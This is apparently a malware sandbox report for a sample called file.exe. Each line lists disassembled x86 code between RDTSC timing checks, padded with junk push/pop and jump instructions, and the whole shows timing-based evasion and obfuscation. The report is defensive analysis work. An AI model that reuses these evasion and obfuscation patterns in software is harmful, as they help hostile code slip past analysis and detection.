Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 760031D second address: 760034F instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F1F80D77655h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 xchg eax, edi 0x0000000a jmp 00007F1F80D7764Eh 0x0000000f push dword ptr [eax] 0x00000011 push eax 0x00000012 push edx 0x00000013 pushad 0x00000014 pushad 0x00000015 popad 0x00000016 mov ecx, edi 0x00000018 popad 0x00000019 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 760034F second address: 7600370 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push esi 0x00000004 pop ebx 0x00000005 push esi 0x00000006 pop ebx 0x00000007 popad 0x00000008 pop edx 0x00000009 pop eax 0x0000000a mov eax, dword ptr fs:[00000030h] 0x00000010 push eax 0x00000011 push edx 0x00000012 jmp 00007F1F81013DAFh 0x00000017 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 7600370 second address: 7600388 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F1F80D77654h 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 7600481 second address: 76004DD instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F1F81013DB5h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov dword ptr [esi], edi 0x0000000b pushad 0x0000000c mov edi, ecx 0x0000000e mov bh, cl 0x00000010 popad 0x00000011 mov dword ptr [esi+04h], eax 0x00000014 pushad 0x00000015 mov bx, A394h 0x00000019 mov bx, 6500h 0x0000001d popad 0x0000001e mov dword ptr [esi+08h], eax 0x00000021 push eax 0x00000022 push edx 0x00000023 pushad 0x00000024 pushfd 0x00000025 jmp 00007F1F81013DB0h 0x0000002a sub si, 7348h 0x0000002f jmp 00007F1F81013DABh 0x00000034 popfd 0x00000035 mov eax, 732AEABFh 0x0000003a popad 0x0000003b rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 76004DD second address: 7600508 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F1F80D77655h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov dword ptr [esi+0Ch], eax 0x0000000c push eax 0x0000000d push edx 0x0000000e jmp 00007F1F80D7764Dh 0x00000013 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 7600508 second address: 76005B0 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov cx, bx 0x00000006 pushfd 0x00000007 jmp 00007F1F81013DB3h 0x0000000c xor si, 539Eh 0x00000011 jmp 00007F1F81013DB9h 0x00000016 popfd 0x00000017 popad 0x00000018 pop edx 0x00000019 pop eax 0x0000001a mov eax, dword ptr [ebx+4Ch] 0x0000001d pushad 0x0000001e pushfd 0x0000001f jmp 00007F1F81013DACh 0x00000024 and eax, 25EB9D98h 0x0000002a jmp 00007F1F81013DABh 0x0000002f popfd 0x00000030 mov ah, 57h 0x00000032 popad 0x00000033 mov dword ptr [esi+10h], eax 0x00000036 pushad 0x00000037 mov di, BD74h 0x0000003b mov bx, 3CE0h 0x0000003f popad 0x00000040 mov eax, dword ptr [ebx+50h] 0x00000043 pushad 0x00000044 mov ax, bx 0x00000047 call 00007F1F81013DB1h 0x0000004c pushad 0x0000004d popad 0x0000004e pop eax 0x0000004f popad 0x00000050 mov dword ptr [esi+14h], eax 0x00000053 push eax 0x00000054 push edx 0x00000055 jmp 00007F1F81013DB8h 0x0000005a rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 76005B0 second address: 76005F7 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 movsx edx, si 0x00000006 pushfd 0x00000007 jmp 00007F1F80D7764Ah 0x0000000c adc si, 2CB8h 0x00000011 jmp 00007F1F80D7764Bh 0x00000016 popfd 0x00000017 popad 0x00000018 pop edx 0x00000019 pop eax 0x0000001a mov eax, dword ptr [ebx+54h] 0x0000001d jmp 00007F1F80D77656h 0x00000022 mov dword ptr [esi+18h], eax 0x00000025 push eax 0x00000026 push edx 0x00000027 push eax 0x00000028 push edx 0x00000029 push eax 0x0000002a push edx 0x0000002b rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 76005F7 second address: 76005FB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 76005FB second address: 7600601 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 7600601 second address: 7600610 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F1F81013DABh 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 7600610 second address: 7600624 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 mov eax, dword ptr [ebx+58h] 0x0000000b push eax 0x0000000c push edx 0x0000000d pushad 0x0000000e mov bh, cl 0x00000010 mov ax, di 0x00000013 popad 0x00000014 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 7600624 second address: 760062A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 760062A second address: 760062E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 760062E second address: 760065F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 mov dword ptr [esi+1Ch], eax 0x0000000b jmp 00007F1F81013DAAh 0x00000010 mov eax, dword ptr [ebx+5Ch] 0x00000013 push eax 0x00000014 push edx 0x00000015 jmp 00007F1F81013DB7h 0x0000001a rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 760065F second address: 7600703 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 movsx ebx, si 0x00000006 pushfd 0x00000007 jmp 00007F1F80D77650h 0x0000000c adc ax, 9D68h 0x00000011 jmp 00007F1F80D7764Bh 0x00000016 popfd 0x00000017 popad 0x00000018 pop edx 0x00000019 pop eax 0x0000001a mov dword ptr [esi+20h], eax 0x0000001d jmp 00007F1F80D77656h 0x00000022 mov eax, dword ptr [ebx+60h] 0x00000025 jmp 00007F1F80D77650h 0x0000002a mov dword ptr [esi+24h], eax 0x0000002d jmp 00007F1F80D77650h 0x00000032 mov eax, dword ptr [ebx+64h] 0x00000035 push eax 0x00000036 push edx 0x00000037 pushad 0x00000038 mov eax, edi 0x0000003a pushfd 0x0000003b jmp 00007F1F80D77659h 0x00000040 and ax, 6246h 0x00000045 jmp 00007F1F80D77651h 0x0000004a popfd 0x0000004b popad 0x0000004c rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 7600703 second address: 7600752 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 call 00007F1F81013DB7h 0x00000008 pop eax 0x00000009 mov bh, 97h 0x0000000b popad 0x0000000c pop edx 0x0000000d pop eax 0x0000000e mov dword ptr [esi+28h], eax 0x00000011 jmp 00007F1F81013DB0h 0x00000016 mov eax, dword ptr [ebx+68h] 0x00000019 push eax 0x0000001a push edx 0x0000001b jmp 00007F1F81013DB7h 0x00000020 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 7600752 second address: 760077B instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F1F80D77659h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov dword ptr [esi+2Ch], eax 0x0000000c push eax 0x0000000d push edx 0x0000000e pushad 0x0000000f mov cx, bx 0x00000012 mov ecx, ebx 0x00000014 popad 0x00000015 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 760077B second address: 76007AD instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F1F81013DB0h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov ax, word ptr [ebx+6Ch] 0x0000000d jmp 00007F1F81013DB0h 0x00000012 mov word ptr [esi+30h], ax 0x00000016 push eax 0x00000017 push edx 0x00000018 push eax 0x00000019 push edx 0x0000001a pushad 0x0000001b popad 0x0000001c rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 76007AD second address: 76007B1 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 76007B1 second address: 76007B7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 76007B7 second address: 76007D5 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov ah, C7h 0x00000005 mov ebx, 23360362h 0x0000000a popad 0x0000000b pop edx 0x0000000c pop eax 0x0000000d mov ax, word ptr [ebx+00000088h] 0x00000014 push eax 0x00000015 push edx 0x00000016 pushad 0x00000017 mov ax, 8F61h 0x0000001b push eax 0x0000001c pop ebx 0x0000001d popad 0x0000001e rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 76007D5 second address: 76007DB instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 76007DB second address: 76007DF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 76007DF second address: 76007E3 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 76007E3 second address: 7600850 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 mov word ptr [esi+32h], ax 0x0000000c jmp 00007F1F80D77651h 0x00000011 mov eax, dword ptr [ebx+0000008Ch] 0x00000017 pushad 0x00000018 mov cx, 34C3h 0x0000001c pushfd 0x0000001d jmp 00007F1F80D77658h 0x00000022 add ax, F788h 0x00000027 jmp 00007F1F80D7764Bh 0x0000002c popfd 0x0000002d popad 0x0000002e mov dword ptr [esi+34h], eax 0x00000031 push eax 0x00000032 push edx 0x00000033 jmp 00007F1F80D77655h 0x00000038 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 7600850 second address: 76008D4 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F1F81013DB1h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov eax, dword ptr [ebx+18h] 0x0000000c pushad 0x0000000d mov al, ECh 0x0000000f pushad 0x00000010 pushfd 0x00000011 jmp 00007F1F81013DAFh 0x00000016 xor al, FFFFFFDEh 0x00000019 jmp 00007F1F81013DB9h 0x0000001e popfd 0x0000001f pushfd 0x00000020 jmp 00007F1F81013DB0h 0x00000025 or cx, 11D8h 0x0000002a jmp 00007F1F81013DABh 0x0000002f popfd 0x00000030 popad 0x00000031 popad 0x00000032 mov dword ptr [esi+38h], eax 0x00000035 push eax 0x00000036 push edx 0x00000037 push eax 0x00000038 push edx 0x00000039 jmp 00007F1F81013DB0h 0x0000003e rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 76008D4 second address: 76008E3 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F1F80D7764Bh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 7600A55 second address: 7600A71 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F1F81013DB8h 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 7600A71 second address: 7600A75 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 7600A75 second address: 7600AA4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push ebp 0x00000009 pushad 0x0000000a pushad 0x0000000b movzx esi, bx 0x0000000e call 00007F1F81013DB5h 0x00000013 pop esi 0x00000014 popad 0x00000015 popad 0x00000016 mov dword ptr [esp], eax 0x00000019 push eax 0x0000001a push edx 0x0000001b push eax 0x0000001c push edx 0x0000001d push eax 0x0000001e push edx 0x0000001f rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 7600AA4 second address: 7600AA8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 7600AA8 second address: 7600AAC instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 7600AAC second address: 7600AB2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 7600AB2 second address: 7600AB8 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 7600AF3 second address: 7600B20 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushfd 0x00000005 jmp 00007F1F80D77653h 0x0000000a jmp 00007F1F80D77653h 0x0000000f popfd 0x00000010 popad 0x00000011 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 7600B20 second address: 7600B44 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F1F81013DB9h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 test edi, edi 0x0000000b push eax 0x0000000c push edx 0x0000000d pushad 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 7600B44 second address: 7600B4D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 mov dx, 317Ch 0x00000008 popad 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 7600B4D second address: 7600C01 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushfd 0x00000004 jmp 00007F1F81013DB0h 0x00000009 xor eax, 2E0A7C98h 0x0000000f jmp 00007F1F81013DABh 0x00000014 popfd 0x00000015 popad 0x00000016 pop edx 0x00000017 pop eax 0x00000018 js 00007F1FEF3428F3h 0x0000001e pushad 0x0000001f pushfd 0x00000020 jmp 00007F1F81013DABh 0x00000025 jmp 00007F1F81013DB3h 0x0000002a popfd 0x0000002b call 00007F1F81013DB8h 0x00000030 push esi 0x00000031 pop edx 0x00000032 pop ecx 0x00000033 popad 0x00000034 mov eax, dword ptr [ebp-0Ch] 0x00000037 jmp 00007F1F81013DADh 0x0000003c mov dword ptr [esi+04h], eax 0x0000003f pushad 0x00000040 call 00007F1F81013DACh 0x00000045 pop edx 0x00000046 movzx esi, bx 0x00000049 popad 0x0000004a lea eax, dword ptr [ebx+78h] 0x0000004d jmp 00007F1F81013DB9h 0x00000052 push 00000001h 0x00000054 pushad 0x00000055 push eax 0x00000056 push edx 0x00000057 push eax 0x00000058 push edx 0x00000059 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 7600C01 second address: 7600C05 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 7600C05 second address: 7600CA7 instructions: 0x00000000 rdtsc 0x00000002 pushfd 0x00000003 jmp 00007F1F81013DB8h 0x00000008 sbb si, B078h 0x0000000d jmp 00007F1F81013DABh 0x00000012 popfd 0x00000013 pop edx 0x00000014 pop eax 0x00000015 push esi 0x00000016 pushfd 0x00000017 jmp 00007F1F81013DAFh 0x0000001c or si, 603Eh 0x00000021 jmp 00007F1F81013DB9h 0x00000026 popfd 0x00000027 pop esi 0x00000028 popad 0x00000029 push ebx 0x0000002a jmp 00007F1F81013DACh 0x0000002f mov dword ptr [esp], eax 0x00000032 jmp 00007F1F81013DB0h 0x00000037 lea eax, dword ptr [ebp-08h] 0x0000003a jmp 00007F1F81013DB0h 0x0000003f nop 0x00000040 push eax 0x00000041 push edx 0x00000042 push eax 0x00000043 push edx 0x00000044 jmp 00007F1F81013DAAh 0x00000049 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 7600CA7 second address: 7600CB6 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F1F80D7764Bh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 7600CB6 second address: 7600D48 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushfd 0x00000004 jmp 00007F1F81013DAFh 0x00000009 jmp 00007F1F81013DB3h 0x0000000e popfd 0x0000000f pushfd 0x00000010 jmp 00007F1F81013DB8h 0x00000015 sbb eax, 39634388h 0x0000001b jmp 00007F1F81013DABh 0x00000020 popfd 0x00000021 popad 0x00000022 pop edx 0x00000023 pop eax 0x00000024 push eax 0x00000025 pushad 0x00000026 pushfd 0x00000027 jmp 00007F1F81013DAFh 0x0000002c add ecx, 6F58F7CEh 0x00000032 jmp 00007F1F81013DB9h 0x00000037 popfd 0x00000038 movzx esi, dx 0x0000003b popad 0x0000003c nop 0x0000003d push eax 0x0000003e push edx 0x0000003f push eax 0x00000040 push edx 0x00000041 push eax 0x00000042 push edx 0x00000043 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 7600D48 second address: 7600D4C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 7600D4C second address: 7600D60 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F1F81013DB0h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 7600D60 second address: 7600D66 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 7600DAD second address: 7600DC3 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F1F81013DB2h 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 7600DC3 second address: 7600DDC instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 mov edi, eax 0x0000000a pushad 0x0000000b mov bx, E380h 0x0000000f mov dh, B7h 0x00000011 popad 0x00000012 test edi, edi 0x00000014 push eax 0x00000015 push edx 0x00000016 pushad 0x00000017 push eax 0x00000018 push edx 0x00000019 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 7600DDC second address: 7600DE3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 7600DE3 second address: 7600DFC instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F1F80D77655h 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 7600DFC second address: 7600E00 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 7600E00 second address: 7600E80 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 js 00007F1FEF0A5EF7h 0x0000000e jmp 00007F1F80D7764Dh 0x00000013 mov eax, dword ptr [ebp-04h] 0x00000016 jmp 00007F1F80D7764Eh 0x0000001b mov dword ptr [esi+08h], eax 0x0000001e jmp 00007F1F80D77650h 0x00000023 lea eax, dword ptr [ebx+70h] 0x00000026 jmp 00007F1F80D77650h 0x0000002b push 00000001h 0x0000002d pushad 0x0000002e mov bl, FFh 0x00000030 popad 0x00000031 nop 0x00000032 jmp 00007F1F80D77654h 0x00000037 push eax 0x00000038 jmp 00007F1F80D7764Bh 0x0000003d nop 0x0000003e push eax 0x0000003f push edx 0x00000040 push eax 0x00000041 push edx 0x00000042 pushad 0x00000043 popad 0x00000044 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 7600E80 second address: 7600E86 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 7600E86 second address: 7600E9B instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F1F80D7764Ah 0x00000007 pop edx 0x00000008 pop eax 0x00000009 lea eax, dword ptr [ebp-18h] 0x0000000c pushad 0x0000000d pushad 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 7600E9B second address: 7600ED1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push esi 0x00000005 pop ebx 0x00000006 popad 0x00000007 jmp 00007F1F81013DB6h 0x0000000c popad 0x0000000d nop 0x0000000e jmp 00007F1F81013DB0h 0x00000013 push eax 0x00000014 push eax 0x00000015 push edx 0x00000016 push eax 0x00000017 push edx 0x00000018 pushad 0x00000019 popad 0x0000001a rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 7600ED1 second address: 7600ED7 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 7600ED7 second address: 7600EDD instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 7600F53 second address: 7600FB7 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F1F80D7764Bh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov eax, dword ptr [ebp-14h] 0x0000000c jmp 00007F1F80D77656h 0x00000011 mov ecx, esi 0x00000013 pushad 0x00000014 pushfd 0x00000015 jmp 00007F1F80D7764Eh 0x0000001a add al, FFFFFFE8h 0x0000001d jmp 00007F1F80D7764Bh 0x00000022 popfd 0x00000023 mov cx, 17DFh 0x00000027 popad 0x00000028 mov dword ptr [esi+0Ch], eax 0x0000002b push eax 0x0000002c push edx 0x0000002d jmp 00007F1F80D77651h 0x00000032 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 7600FB7 second address: 7600FBD instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 7600FBD second address: 7600FFC instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F1F80D77653h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b mov edx, 759B06ECh 0x00000010 pushad 0x00000011 push eax 0x00000012 push ebx 0x00000013 pop esi 0x00000014 pop edx 0x00000015 mov ecx, 6910FE43h 0x0000001a popad 0x0000001b sub eax, eax 0x0000001d push eax 0x0000001e push edx 0x0000001f jmp 00007F1F80D77652h 0x00000024 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 7600FFC second address: 7601042 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F1F81013DABh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 lock cmpxchg dword ptr [edx], ecx 0x0000000d pushad 0x0000000e pushfd 0x0000000f jmp 00007F1F81013DB4h 0x00000014 jmp 00007F1F81013DB5h 0x00000019 popfd 0x0000001a push eax 0x0000001b push edx 0x0000001c mov ecx, 6861232Dh 0x00000021 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 7601042 second address: 760106F instructions: 0x00000000 rdtsc 0x00000002 mov cx, C529h 0x00000006 pop edx 0x00000007 pop eax 0x00000008 popad 0x00000009 pop edi 0x0000000a push eax 0x0000000b push edx 0x0000000c pushad 0x0000000d mov dh, 58h 0x0000000f pushfd 0x00000010 jmp 00007F1F80D7764Ah 0x00000015 and eax, 226072F8h 0x0000001b jmp 00007F1F80D7764Bh 0x00000020 popfd 0x00000021 popad 0x00000022 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 760106F second address: 7601094 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F1F81013DB9h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 test eax, eax 0x0000000b pushad 0x0000000c push eax 0x0000000d push edx 0x0000000e mov dx, ax 0x00000011 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 7601094 second address: 76010F4 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F1F80D77656h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push ecx 0x0000000a pushad 0x0000000b popad 0x0000000c pop edx 0x0000000d popad 0x0000000e jne 00007F1FEF0A5C6Fh 0x00000014 jmp 00007F1F80D7764Ah 0x00000019 mov edx, dword ptr [ebp+08h] 0x0000001c pushad 0x0000001d mov ax, B43Dh 0x00000021 mov edx, ecx 0x00000023 popad 0x00000024 mov eax, dword ptr [esi] 0x00000026 jmp 00007F1F80D77654h 0x0000002b mov dword ptr [edx], eax 0x0000002d push eax 0x0000002e push edx 0x0000002f push eax 0x00000030 push edx 0x00000031 jmp 00007F1F80D7764Ah 0x00000036 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 76010F4 second address: 76010F8 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 76010F8 second address: 76010FE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 76010FE second address: 760116D instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F1F81013DAEh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov eax, dword ptr [esi+04h] 0x0000000c jmp 00007F1F81013DB0h 0x00000011 mov dword ptr [edx+04h], eax 0x00000014 jmp 00007F1F81013DB0h 0x00000019 mov eax, dword ptr [esi+08h] 0x0000001c jmp 00007F1F81013DB0h 0x00000021 mov dword ptr [edx+08h], eax 0x00000024 jmp 00007F1F81013DB0h 0x00000029 mov eax, dword ptr [esi+0Ch] 0x0000002c push eax 0x0000002d push edx 0x0000002e push eax 0x0000002f push edx 0x00000030 jmp 00007F1F81013DAAh 0x00000035 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 760116D second address: 760117C instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F1F80D7764Bh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 760117C second address: 7601194 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F1F81013DB4h 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 7601194 second address: 7601198 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
